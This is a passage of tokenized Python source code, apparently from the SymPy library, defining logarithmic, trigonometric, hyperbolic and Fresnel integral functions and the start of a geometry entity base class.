<NUM_LIT:1> ) : <EOL> arg = self . args [ <NUM_LIT:0> ] <EOL> if argindex == <NUM_LIT:1> : <EOL> return S . One / log ( arg ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def _eval_conjugate ( self ) : <EOL> z = self . args [ <NUM_LIT:0> ] <EOL> if not ( z . is_real and z . is_negative ) : <EOL> return self . func ( z . conjugate ( ) ) <EOL> def _eval_rewrite_as_Li ( self , z ) : <EOL> return Li ( z ) + li ( <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_Ei ( self , z ) : <EOL> return Ei ( log ( z ) ) <EOL> def _eval_rewrite_as_uppergamma ( self , z ) : <EOL> from sympy import uppergamma <EOL> return ( - uppergamma ( <NUM_LIT:0> , - log ( z ) ) + <EOL> S . Half * ( log ( log ( z ) ) - log ( S . One / log ( z ) ) ) - log ( - log ( z ) ) ) <EOL> def _eval_rewrite_as_Si ( self , z ) : <EOL> return ( Ci ( I * log ( z ) ) - I * Si ( I * log ( z ) ) - <EOL> S . Half * ( log ( S . One / log ( z ) ) - log ( log ( z ) ) ) - log ( I * log ( z ) ) ) <EOL> _eval_rewrite_as_Ci = _eval_rewrite_as_Si <EOL> def _eval_rewrite_as_Shi ( self , z ) : <EOL> return ( Chi ( log ( z ) ) - Shi ( log ( z ) ) - S . Half * ( log ( S . One / log ( z ) ) - log ( log ( z ) ) ) ) <EOL> _eval_rewrite_as_Chi = _eval_rewrite_as_Shi <EOL> def _eval_rewrite_as_hyper ( self , z ) : <EOL> return ( log ( z ) * hyper ( ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:2> , <NUM_LIT:2> ) , log ( z ) ) + <EOL> S . Half * ( log ( log ( z ) ) - log ( S . One / log ( z ) ) ) + S . EulerGamma ) <EOL> def _eval_rewrite_as_meijerg ( self , z ) : <EOL> return ( - log ( - log ( z ) ) - S . Half * ( log ( S . One / log ( z ) ) - log ( log ( z ) ) ) <EOL> - meijerg ( ( ( ) , ( <NUM_LIT:1> , ) ) , ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( ) ) , - log ( z ) ) ) <EOL> def _eval_rewrite_as_tractable ( self , z ) : <EOL> return z * _eis ( log ( z ) ) <EOL> class Li ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if z is S . Infinity : <EOL> return S . Infinity <EOL> elif z is <NUM_LIT:2> * S . One : <EOL> return S . Zero <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> arg = self . args [ <NUM_LIT:0> ] <EOL> if argindex == <NUM_LIT:1> : <EOL> return S . One / log ( arg ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def _eval_evalf ( self , prec ) : <EOL> return self . rewrite ( li ) . evalf ( prec ) <EOL> def _eval_rewrite_as_li ( self , z ) : <EOL> return li ( z ) - li ( <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_tractable ( self , z ) : <EOL> return self . rewrite ( li ) . rewrite ( "<STR_LIT>" , deep = True ) <EOL> class TrigonometricIntegral ( Function ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if z == <NUM_LIT:0> : <EOL> return cls . _atzero <EOL> elif z is S . Infinity : <EOL> return cls . _atinf ( ) <EOL> elif z is S . NegativeInfinity : <EOL> return cls . _atneginf ( ) <EOL> nz = z . extract_multiplicatively ( polar_lift ( I ) ) <EOL> if nz is None and cls . _trigfunc ( <NUM_LIT:0> ) == <NUM_LIT:0> : <EOL> nz = z . extract_multiplicatively ( I ) <EOL> if nz is not None : <EOL> return cls . _Ifactor ( nz , <NUM_LIT:1> ) <EOL> nz = z . extract_multiplicatively ( polar_lift ( - I ) ) <EOL> if nz is not None : <EOL> return cls . _Ifactor ( nz , - <NUM_LIT:1> ) <EOL> nz = z . extract_multiplicatively ( polar_lift ( - <NUM_LIT:1> ) ) <EOL> if nz is None and cls . _trigfunc ( <NUM_LIT:0> ) == <NUM_LIT:0> : <EOL> nz = z . extract_multiplicatively ( - <NUM_LIT:1> ) <EOL> if nz is not None : <EOL> return cls . _minusfactor ( nz ) <EOL> nz , n = z . extract_branch_factor ( ) <EOL> if n == <NUM_LIT:0> and nz == z : <EOL> return <EOL> return <NUM_LIT:2> * pi * I * n * cls . _trigfunc ( <NUM_LIT:0> ) + cls ( nz ) <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> from sympy import unpolarify <EOL> arg = unpolarify ( self . args [ <NUM_LIT:0> ] ) <EOL> if argindex == <NUM_LIT:1> : <EOL> return self . _trigfunc ( arg ) / arg <EOL> def _eval_rewrite_as_Ei ( self , z ) : <EOL> return self . _eval_rewrite_as_expint ( z ) . rewrite ( Ei ) <EOL> def _eval_rewrite_as_uppergamma ( self , z ) : <EOL> from sympy import uppergamma <EOL> return self . _eval_rewrite_as_expint ( z ) . rewrite ( uppergamma ) <EOL> def _eval_nseries ( self , x , n , logx ) : <EOL> from sympy import log , EulerGamma , Pow <EOL> n += <NUM_LIT:1> <EOL> if self . args [ <NUM_LIT:0> ] . subs ( x , <NUM_LIT:0> ) != <NUM_LIT:0> : <EOL> return super ( TrigonometricIntegral , self ) . _eval_nseries ( x , n , logx ) <EOL> baseseries = self . _trigfunc ( x ) . _eval_nseries ( x , n , logx ) <EOL> if self . _trigfunc ( <NUM_LIT:0> ) != <NUM_LIT:0> : <EOL> baseseries -= <NUM_LIT:1> <EOL> baseseries = baseseries . replace ( Pow , lambda t , n : t ** n / n , simultaneous = False ) <EOL> if self . _trigfunc ( <NUM_LIT:0> ) != <NUM_LIT:0> : <EOL> baseseries += EulerGamma + log ( x ) <EOL> return baseseries . subs ( x , self . args [ <NUM_LIT:0> ] ) . _eval_nseries ( x , n , logx ) <EOL> class Si ( TrigonometricIntegral ) : <EOL> r"""<STR_LIT>""" <EOL> _trigfunc = sin <EOL> _atzero = S ( <NUM_LIT:0> ) <EOL> @ classmethod <EOL> def _atinf ( cls ) : <EOL> return pi * S . Half <EOL> @ classmethod <EOL> def _atneginf ( cls ) : <EOL> return - pi * S . Half <EOL> @ classmethod <EOL> def _minusfactor ( cls , z ) : <EOL> return - Si ( z ) <EOL> @ classmethod <EOL> def _Ifactor ( cls , z , sign ) : <EOL> return I * Shi ( z ) * sign <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> return pi / <NUM_LIT:2> + ( E1 ( polar_lift ( I ) * z ) - E1 ( polar_lift ( - I ) * z ) ) / <NUM_LIT:2> / I <EOL> def _eval_rewrite_as_sinc ( self , z ) : <EOL> from sympy import Integral <EOL> t = Symbol ( '<STR_LIT:t>' , Dummy = True ) <EOL> return Integral ( sinc ( t ) , ( t , <NUM_LIT:0> , z ) ) <EOL> def _sage_ ( self ) : <EOL> import sage . all as sage <EOL> return sage . sin_integral ( self . args [ <NUM_LIT:0> ] . _sage_ ( ) ) <EOL> class Ci ( TrigonometricIntegral ) : <EOL> r"""<STR_LIT>""" <EOL> _trigfunc = cos <EOL> _atzero = S . ComplexInfinity <EOL> @ classmethod <EOL> def _atinf ( cls ) : <EOL> return S . Zero <EOL> @ classmethod <EOL> def _atneginf ( cls ) : <EOL> return I * pi <EOL> @ classmethod <EOL> def _minusfactor ( cls , z ) : <EOL> return Ci ( z ) + I * pi <EOL> @ classmethod <EOL> def _Ifactor ( cls , z , sign ) : <EOL> return Chi ( z ) + I * pi / <NUM_LIT:2> * sign <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> return - ( E1 ( polar_lift ( I ) * z ) + E1 ( polar_lift ( - I ) * z ) ) / <NUM_LIT:2> <EOL> def _sage_ ( self ) : <EOL> import sage . all as sage <EOL> return sage . cos_integral ( self . args [ <NUM_LIT:0> ] . _sage_ ( ) ) <EOL> class Shi ( TrigonometricIntegral ) : <EOL> r"""<STR_LIT>""" <EOL> _trigfunc = sinh <EOL> _atzero = S ( <NUM_LIT:0> ) <EOL> @ classmethod <EOL> def _atinf ( cls ) : <EOL> return S . Infinity <EOL> @ classmethod <EOL> def _atneginf ( cls ) : <EOL> return S . NegativeInfinity <EOL> @ classmethod <EOL> def _minusfactor ( cls , z ) : <EOL> return - Shi ( z ) <EOL> @ classmethod <EOL> def _Ifactor ( cls , z , sign ) : <EOL> return I * Si ( z ) * sign <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> from sympy import exp_polar <EOL> return ( E1 ( z ) - E1 ( exp_polar ( I * pi ) * z ) ) / <NUM_LIT:2> - I * pi / <NUM_LIT:2> <EOL> def _sage_ ( self ) : <EOL> import sage . all as sage <EOL> return sage . sinh_integral ( self . args [ <NUM_LIT:0> ] . _sage_ ( ) ) <EOL> class Chi ( TrigonometricIntegral ) : <EOL> r"""<STR_LIT>""" <EOL> _trigfunc = cosh <EOL> _atzero = S . ComplexInfinity <EOL> @ classmethod <EOL> def _atinf ( cls ) : <EOL> return S . Infinity <EOL> @ classmethod <EOL> def _atneginf ( cls ) : <EOL> return S . Infinity <EOL> @ classmethod <EOL> def _minusfactor ( cls , z ) : <EOL> return Chi ( z ) + I * pi <EOL> @ classmethod <EOL> def _Ifactor ( cls , z , sign ) : <EOL> return Ci ( z ) + I * pi / <NUM_LIT:2> * sign <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> from sympy import exp_polar <EOL> return - I * pi / <NUM_LIT:2> - ( E1 ( z ) + E1 ( exp_polar ( I * pi ) * z ) ) / <NUM_LIT:2> <EOL> def _latex ( self , printer , exp = None ) : <EOL> if len ( self . args ) != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if exp : <EOL> return r'<STR_LIT>' % ( printer . _print ( exp ) , printer . _print ( self . args [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> return r'<STR_LIT>' % printer . _print ( self . args [ <NUM_LIT:0> ] ) <EOL> @ staticmethod <EOL> def _latex_no_arg ( printer ) : <EOL> return r'<STR_LIT>' <EOL> def _sage_ ( self ) : <EOL> import sage . all as sage <EOL> return sage . cosh_integral ( self . args [ <NUM_LIT:0> ] . _sage_ ( ) ) <EOL> class FresnelIntegral ( Function ) : <EOL> """<STR_LIT>""" <EOL> unbranched = True <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if z is S . Zero : <EOL> return S ( <NUM_LIT:0> ) <EOL> prefact = S . One <EOL> newarg = z <EOL> changed = False <EOL> nz = newarg . extract_multiplicatively ( - <NUM_LIT:1> ) <EOL> if nz is not None : <EOL> prefact = - prefact <EOL> newarg = nz <EOL> changed = True <EOL> nz = newarg . extract_multiplicatively ( I ) <EOL> if nz is not None : <EOL> prefact = cls . _sign * I * prefact <EOL> newarg = nz <EOL> changed = True <EOL> if changed : <EOL> return prefact * cls ( newarg ) <EOL> if z is S . Infinity : <EOL> return S . Half <EOL> elif z is I * S . Infinity : <EOL> return cls . _sign * I * S . Half <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> return self . _trigfunc ( S . Half * pi * self . args [ <NUM_LIT:0> ] ** <NUM_LIT:2> ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def _eval_is_real ( self ) : <EOL> return self . args [ <NUM_LIT:0> ] . is_real <EOL> def _eval_conjugate ( self ) : <EOL> return self . func ( self . args [ <NUM_LIT:0> ] . conjugate ( ) ) <EOL> def _as_real_imag ( self , deep = True , ** hints ) : <EOL> if self . args [ <NUM_LIT:0> ] . is_real : <EOL> if deep : <EOL> hints [ '<STR_LIT>' ] = False <EOL> return ( self . expand ( deep , ** hints ) , S . Zero ) <EOL> else : <EOL> return ( self , S . Zero ) <EOL> if deep : <EOL> re , im = self . args [ <NUM_LIT:0> ] . expand ( deep , ** hints ) . as_real_imag ( ) <EOL> else : <EOL> re , im = self . args [ <NUM_LIT:0> ] . as_real_imag ( ) <EOL> return ( re , im ) <EOL> def as_real_imag ( self , deep = True , ** hints ) : <EOL> x , y = self . _as_real_imag ( deep = deep , ** hints ) <EOL> sq = - y ** <NUM_LIT:2> / x ** <NUM_LIT:2> <EOL> re = S . Half * ( self . func ( x + x * sqrt ( sq ) ) + self . func ( x - x * sqrt ( sq ) ) ) <EOL> im = x / ( <NUM_LIT:2> * y ) * sqrt ( sq ) * ( self . func ( x - x * sqrt ( sq ) ) - <EOL> self . func ( x + x * sqrt ( sq ) ) ) <EOL> return ( re , im ) <EOL> class fresnels ( FresnelIntegral ) : <EOL> r"""<STR_LIT>""" <EOL> _trigfunc = sin <EOL> _sign = - S . One <EOL> @ staticmethod <EOL> @ cacheit <EOL> def taylor_term ( n , x , * previous_terms ) : <EOL> if n < <NUM_LIT:0> : <EOL> return S . Zero <EOL> else : <EOL> x = sympify ( x ) <EOL> if len ( previous_terms ) > <NUM_LIT:1> : <EOL> p = previous_terms [ - <NUM_LIT:1> ] <EOL> return ( - pi ** <NUM_LIT:2> * x ** <NUM_LIT:4> * ( <NUM_LIT:4> * n - <NUM_LIT:1> ) / ( <NUM_LIT:8> * n * ( <NUM_LIT:2> * n + <NUM_LIT:1> ) * ( <NUM_LIT:4> * n + <NUM_LIT:3> ) ) ) * p <EOL> else : <EOL> return x ** <NUM_LIT:3> * ( - x ** <NUM_LIT:4> ) ** n * ( S ( <NUM_LIT:2> ) ** ( - <NUM_LIT:2> * n - <NUM_LIT:1> ) * pi ** ( <NUM_LIT:2> * n + <NUM_LIT:1> ) ) / ( ( <NUM_LIT:4> * n + <NUM_LIT:3> ) * factorial ( <NUM_LIT:2> * n + <NUM_LIT:1> ) ) <EOL> def _eval_rewrite_as_erf ( self , z ) : <EOL> return ( S . One + I ) / <NUM_LIT:4> * ( erf ( ( S . One + I ) / <NUM_LIT:2> * sqrt ( pi ) * z ) - I * erf ( ( S . One - I ) / <NUM_LIT:2> * sqrt ( pi ) * z ) ) <EOL> def _eval_rewrite_as_hyper ( self , z ) : <EOL> return pi * z ** <NUM_LIT:3> / <NUM_LIT:6> * hyper ( [ S ( <NUM_LIT:3> ) / <NUM_LIT:4> ] , [ S ( <NUM_LIT:3> ) / <NUM_LIT:2> , S ( <NUM_LIT:7> ) / <NUM_LIT:4> ] , - pi ** <NUM_LIT:2> * z ** <NUM_LIT:4> / <NUM_LIT:16> ) <EOL> def _eval_rewrite_as_meijerg ( self , z ) : <EOL> return ( pi * z ** ( S ( <NUM_LIT:9> ) / <NUM_LIT:4> ) / ( sqrt ( <NUM_LIT:2> ) * ( z ** <NUM_LIT:2> ) ** ( S ( <NUM_LIT:3> ) / <NUM_LIT:4> ) * ( - z ) ** ( S ( <NUM_LIT:3> ) / <NUM_LIT:4> ) ) <EOL> * meijerg ( [ ] , [ <NUM_LIT:1> ] , [ S ( <NUM_LIT:3> ) / <NUM_LIT:4> ] , [ S ( <NUM_LIT:1> ) / <NUM_LIT:4> , <NUM_LIT:0> ] , - pi ** <NUM_LIT:2> * z ** <NUM_LIT:4> / <NUM_LIT:16> ) ) <EOL> def _eval_aseries ( self , n , args0 , x , logx ) : <EOL> from sympy import Order <EOL> point = args0 [ <NUM_LIT:0> ] <EOL> if point is S . Infinity : <EOL> z = self . args [ <NUM_LIT:0> ] <EOL> p = [ ( - <NUM_LIT:1> ) ** k * factorial ( <NUM_LIT:4> * k + <NUM_LIT:1> ) / <EOL> ( <NUM_LIT:2> ** ( <NUM_LIT:2> * k + <NUM_LIT:2> ) * z ** ( <NUM_LIT:4> * k + <NUM_LIT:3> ) * <NUM_LIT:2> ** ( <NUM_LIT:2> * k ) * factorial ( <NUM_LIT:2> * k ) ) <EOL> for k in range ( <NUM_LIT:0> , n ) ] <EOL> q = [ <NUM_LIT:1> / ( <NUM_LIT:2> * z ) ] + [ ( - <NUM_LIT:1> ) ** k * factorial ( <NUM_LIT:4> * k - <NUM_LIT:1> ) / <EOL> ( <NUM_LIT:2> ** ( <NUM_LIT:2> * k + <NUM_LIT:1> ) * z ** ( <NUM_LIT:4> * k + <NUM_LIT:1> ) * <NUM_LIT:2> ** ( <NUM_LIT:2> * k - <NUM_LIT:1> ) * factorial ( <NUM_LIT:2> * k - <NUM_LIT:1> ) ) <EOL> for k in range ( <NUM_LIT:1> , n ) ] <EOL> p = [ - sqrt ( <NUM_LIT:2> / pi ) * t for t in p ] + [ Order ( <NUM_LIT:1> / z ** n , x ) ] <EOL> q = [ - sqrt ( <NUM_LIT:2> / pi ) * t for t in q ] + [ Order ( <NUM_LIT:1> / z ** n , x ) ] <EOL> return S . Half + ( sin ( z ** <NUM_LIT:2> ) * Add ( * p ) + cos ( z ** <NUM_LIT:2> ) * Add ( * q ) ) . subs ( x , sqrt ( <NUM_LIT:2> / pi ) * x ) <EOL> return super ( fresnels , self ) . _eval_aseries ( n , args0 , x , logx ) <EOL> class fresnelc ( FresnelIntegral ) : <EOL> r"""<STR_LIT>""" <EOL> _trigfunc = cos <EOL> _sign = S . One <EOL> @ staticmethod <EOL> @ cacheit <EOL> def taylor_term ( n , x , * previous_terms ) : <EOL> if n < <NUM_LIT:0> : <EOL> return S . Zero <EOL> else : <EOL> x = sympify ( x ) <EOL> if len ( previous_terms ) > <NUM_LIT:1> : <EOL> p = previous_terms [ - <NUM_LIT:1> ] <EOL> return ( - pi ** <NUM_LIT:2> * x ** <NUM_LIT:4> * ( <NUM_LIT:4> * n - <NUM_LIT:3> ) / ( <NUM_LIT:8> * n * ( <NUM_LIT:2> * n - <NUM_LIT:1> ) * ( <NUM_LIT:4> * n + <NUM_LIT:1> ) ) ) * p <EOL> else : <EOL> return x * ( - x ** <NUM_LIT:4> ) ** n * ( S ( <NUM_LIT:2> ) ** ( - <NUM_LIT:2> * n ) * pi ** ( <NUM_LIT:2> * n ) ) / ( ( <NUM_LIT:4> * n + <NUM_LIT:1> ) * factorial ( <NUM_LIT:2> * n ) ) <EOL> def _eval_rewrite_as_erf ( self , z ) : <EOL> return ( S . One - I ) / <NUM_LIT:4> * ( erf ( ( S . One + I ) / <NUM_LIT:2> * sqrt ( pi ) * z ) + I * erf ( ( S . One - I ) / <NUM_LIT:2> * sqrt ( pi ) * z ) ) <EOL> def _eval_rewrite_as_hyper ( self , z ) : <EOL> return z * hyper ( [ S . One / <NUM_LIT:4> ] , [ S . One / <NUM_LIT:2> , S ( <NUM_LIT:5> ) / <NUM_LIT:4> ] , - pi ** <NUM_LIT:2> * z ** <NUM_LIT:4> / <NUM_LIT:16> ) <EOL> def _eval_rewrite_as_meijerg ( self , z ) : <EOL> return ( pi * z ** ( S ( <NUM_LIT:3> ) / <NUM_LIT:4> ) / ( sqrt ( <NUM_LIT:2> ) * root ( z ** <NUM_LIT:2> , <NUM_LIT:4> ) * root ( - z , <NUM_LIT:4> ) ) <EOL> * meijerg ( [ ] , [ <NUM_LIT:1> ] , [ S ( <NUM_LIT:1> ) / <NUM_LIT:4> ] , [ S ( <NUM_LIT:3> ) / <NUM_LIT:4> , <NUM_LIT:0> ] , - pi ** <NUM_LIT:2> * z ** <NUM_LIT:4> / <NUM_LIT:16> ) ) <EOL> def _eval_aseries ( self , n , args0 , x , logx ) : <EOL> from sympy import Order <EOL> point = args0 [ <NUM_LIT:0> ] <EOL> if point is S . Infinity : <EOL> z = self . args [ <NUM_LIT:0> ] <EOL> p = [ ( - <NUM_LIT:1> ) ** k * factorial ( <NUM_LIT:4> * k + <NUM_LIT:1> ) / <EOL> ( <NUM_LIT:2> ** ( <NUM_LIT:2> * k + <NUM_LIT:2> ) * z ** ( <NUM_LIT:4> * k + <NUM_LIT:3> ) * <NUM_LIT:2> ** ( <NUM_LIT:2> * k ) * factorial ( <NUM_LIT:2> * k ) ) <EOL> for k in range ( <NUM_LIT:0> , n ) ] <EOL> q = [ <NUM_LIT:1> / ( <NUM_LIT:2> * z ) ] + [ ( - <NUM_LIT:1> ) ** k * factorial ( <NUM_LIT:4> * k - <NUM_LIT:1> ) / <EOL> ( <NUM_LIT:2> ** ( <NUM_LIT:2> * k + <NUM_LIT:1> ) * z ** ( <NUM_LIT:4> * k + <NUM_LIT:1> ) * <NUM_LIT:2> ** ( <NUM_LIT:2> * k - <NUM_LIT:1> ) * factorial ( <NUM_LIT:2> * k - <NUM_LIT:1> ) ) <EOL> for k in range ( <NUM_LIT:1> , n ) ] <EOL> p = [ - sqrt ( <NUM_LIT:2> / pi ) * t for t in p ] + [ Order ( <NUM_LIT:1> / z ** n , x ) ] <EOL> q = [ sqrt ( <NUM_LIT:2> / pi ) * t for t in q ] + [ Order ( <NUM_LIT:1> / z ** n , x ) ] <EOL> return S . Half + ( cos ( z ** <NUM_LIT:2> ) * Add ( * p ) + sin ( z ** <NUM_LIT:2> ) * Add ( * q ) ) . subs ( x , sqrt ( <NUM_LIT:2> / pi ) * x ) <EOL> return super ( fresnelc , self ) . _eval_aseries ( n , args0 , x , logx ) <EOL> class _erfs ( Function ) : <EOL> """<STR_LIT>""" <EOL> def _eval_aseries ( self , n , args0 , x , logx ) : <EOL> from sympy import Order <EOL> point = args0 [ <NUM_LIT:0> ] <EOL> if point is S . Infinity : <EOL> z = self . args [ <NUM_LIT:0> ] <EOL> l = [ <NUM_LIT:1> / sqrt ( S . Pi ) * factorial ( <NUM_LIT:2> * k ) * ( - S ( <EOL> <NUM_LIT:4> ) ) ** ( - k ) / factorial ( k ) * ( <NUM_LIT:1> / z ) ** ( <NUM_LIT:2> * k + <NUM_LIT:1> ) for k in range ( <NUM_LIT:0> , n ) ] <EOL> o = Order ( <NUM_LIT:1> / z ** ( <NUM_LIT:2> * n + <NUM_LIT:1> ) , x ) <EOL> return ( Add ( * l ) ) . _eval_nseries ( x , n , logx ) + o <EOL> t = point . extract_multiplicatively ( S . ImaginaryUnit ) <EOL> if t is S . Infinity : <EOL> z = self . args [ <NUM_LIT:0> ] <EOL> l = [ <NUM_LIT:1> / sqrt ( S . Pi ) * factorial ( <NUM_LIT:2> * k ) * ( - S ( <EOL> <NUM_LIT:4> ) ) ** ( - k ) / factorial ( k ) * ( <NUM_LIT:1> / z ) ** ( <NUM_LIT:2> * k + <NUM_LIT:1> ) for k in range ( <NUM_LIT:0> , n ) ] <EOL> o = Order ( <NUM_LIT:1> / z ** ( <NUM_LIT:2> * n + <NUM_LIT:1> ) , x ) <EOL> return ( Add ( * l ) ) . _eval_nseries ( x , n , logx ) + o <EOL> return super ( _erfs , self ) . _eval_aseries ( n , args0 , x , logx ) <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> z = self . args [ <NUM_LIT:0> ] <EOL> return - <NUM_LIT:2> / sqrt ( S . Pi ) + <NUM_LIT:2> * z * _erfs ( z ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def _eval_rewrite_as_intractable ( self , z ) : <EOL> return ( S . One - erf ( z ) ) * exp ( z ** <NUM_LIT:2> ) <EOL> class _eis ( Function ) : <EOL> """<STR_LIT>""" <EOL> def _eval_aseries ( self , n , args0 , x , logx ) : <EOL> from sympy import Order <EOL> if args0 [ <NUM_LIT:0> ] != S . Infinity : <EOL> return super ( _erfs , self ) . _eval_aseries ( n , args0 , x , logx ) <EOL> z = self . args [ <NUM_LIT:0> ] <EOL> l = [ factorial ( k ) * ( <NUM_LIT:1> / z ) ** ( k + <NUM_LIT:1> ) for k in range ( <NUM_LIT:0> , n ) ] <EOL> o = Order ( <NUM_LIT:1> / z ** ( n + <NUM_LIT:1> ) , x ) <EOL> return ( Add ( * l ) ) . _eval_nseries ( x , n , logx ) + o <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> z = self . args [ <NUM_LIT:0> ] <EOL> return S . One / z - _eis ( z ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def _eval_rewrite_as_intractable ( self , z ) : <EOL> return exp ( - z ) * Ei ( z ) <EOL> def _eval_nseries ( self , x , n , logx ) : <EOL> x0 = self . args [ <NUM_LIT:0> ] . limit ( x , <NUM_LIT:0> ) <EOL> if x0 is S . Zero : <EOL> f = self . _eval_rewrite_as_intractable ( * self . args ) <EOL> return f . _eval_nseries ( x , n , logx ) <EOL> return super ( _eis , self ) . _eval_nseries ( x , n , logx ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function <EOL> from sympy . core . compatibility import is_sequence <EOL> from sympy . core . containers import Tuple <EOL> from sympy . core . basic import Basic <EOL> from sympy . core . sympify import sympify <EOL> from sympy . functions import cos , sin <EOL> from sympy . matrices import eye <EOL> from sympy . sets import Set <EOL> ordering_of_classes = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> class GeometryEntity ( Basic ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> def is_seq_and_not_point ( a ) : <EOL> if hasattr ( a , '<STR_LIT>' ) and a . is_Point : <EOL> return False <EOL> return is_sequence ( a ) <EOL> args = [ Tuple ( * a ) if is_seq_and_not_point ( a ) else sympify ( a ) for a in args ] <EOL> return Basic . __new__ ( cls , * args ) <EOL> def _sympy_ ( self ) : <EOL> return self <EOL> def __getnewargs__ ( self ) : <EOL> return tuple ( self . args ) <EOL> def intersection ( self , o ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def rotate ( self , angle , pt = None ) : <EOL> """<STR_LIT>""" <EOL> newargs = [ ] <EOL> for a in self . args : <EOL> if isinstance ( a , GeometryEntity ) : <EOL> newargs . append ( a . rotate ( angle , pt ) ) <EOL> else : <EOL> newargs . append ( a ) <EOL> return type ( self ) ( * newargs ) <EOL> def scale ( self , x = <NUM_LIT:1> , y = <NUM_LIT:1> , pt = None ) : <EOL> """<STR_LIT>""" <EOL> from sympy . geometry . point import Point <EOL> if pt : <EOL> pt = Point ( pt ) <EOL> return self . translate ( * ( - pt ) . args ) . scale ( x , y ) . translate ( * pt . args ) <EOL> return type ( self ) ( * [ a . scale ( x , y ) for a in self . args ] ) <EOL> def translate ( self , x = <NUM_LIT:0> , y = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> newargs = [ ] <EOL> for a in self . args : <EOL> if isinstance ( a , GeometryEntity ) : <EOL> newargs . append ( a . translate ( x , y ) ) <EOL> else : <EOL> newargs . append ( a ) <EOL> return self . func ( * newargs ) <EOL> def reflect ( self , line ) : <EOL> from sympy import atan , Point , Dummy , oo <EOL> g = self <EOL> l = line <EOL> o = Point ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> if l . slope == <NUM_LIT:0> : <EOL> y = l . args [ <NUM_LIT:0> ] . y <EOL> if not y : <EOL> return g . scale ( y = - <NUM_LIT:1> ) <EOL> reps = [ ( p , p . translate ( y = <NUM_LIT:2> * ( y - p . y ) ) ) for p in g . atoms ( Point ) ] <EOL> elif l . slope == oo : <EOL> x = l . args [ <NUM_LIT:0> ] . x <EOL> if not x : <EOL> return g . scale ( x = - <NUM_LIT:1> ) <EOL> reps = [ ( p , p . translate ( x = <NUM_LIT:2> * ( x - p . x ) ) ) for p in g . atoms ( Point ) ] <EOL> else : <EOL> if not hasattr ( g , '<STR_LIT>' ) and not all ( <EOL> isinstance ( arg , Point ) for arg in g . args ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' % g ) <EOL> a = atan ( l . slope ) <EOL> c = l . coefficients <EOL> d = - c [ - <NUM_LIT:1> ] / c [ <NUM_LIT:1> ] <EOL> x , y = Dummy ( ) , Dummy ( ) <EOL> xf = Point ( x , y ) <EOL> xf = xf . translate ( y = - d ) . rotate ( - a , o ) . scale ( y = - <NUM_LIT:1> <EOL> ) . rotate ( a , o ) . translate ( y = d ) <EOL> reps = [ ( p , xf . xreplace ( { x : p . x , y : p . y } ) ) for p in g . atoms ( Point ) ] <EOL> return g . xreplace ( dict ( reps ) ) <EOL> def encloses ( self , o ) : <EOL> """<STR_LIT>""" <EOL> from sympy . geometry . point import Point <EOL> from sympy . geometry . line import Segment , Ray , Line <EOL> from sympy . geometry . ellipse import Ellipse <EOL> from sympy . geometry . polygon import Polygon , RegularPolygon <EOL> if isinstance ( o , Point ) : <EOL> return self . encloses_point ( o ) <EOL> elif isinstance ( o , Segment ) : <EOL> return all ( self . encloses_point ( x ) for x in o . points ) <EOL> elif isinstance ( o , Ray ) or isinstance ( o , Line ) : <EOL> return False <EOL> elif isinstance ( o , Ellipse ) : <EOL> return self . encloses_point ( o . center ) and not self . intersection ( o ) and self . encloses_point ( Point ( o . center . x + o . hradius , o . center . y ) ) <EOL> elif isinstance ( o , Polygon ) : <EOL> if isinstance ( o , RegularPolygon ) : <EOL> if not self . encloses_point ( o . center ) : <EOL> return False <EOL> return all ( self . encloses_point ( v ) for v in o . vertices ) <EOL> raise NotImplementedError ( ) <EOL> @ property <EOL> def ambient_dimension ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ property <EOL> def bounds ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def is_similar ( self , other ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def equals ( self , o ) : <EOL> return self == o <EOL> def _svg ( self , scale_factor = <NUM_LIT:1.> , fill_color = "<STR_LIT>" ) : <EOL> 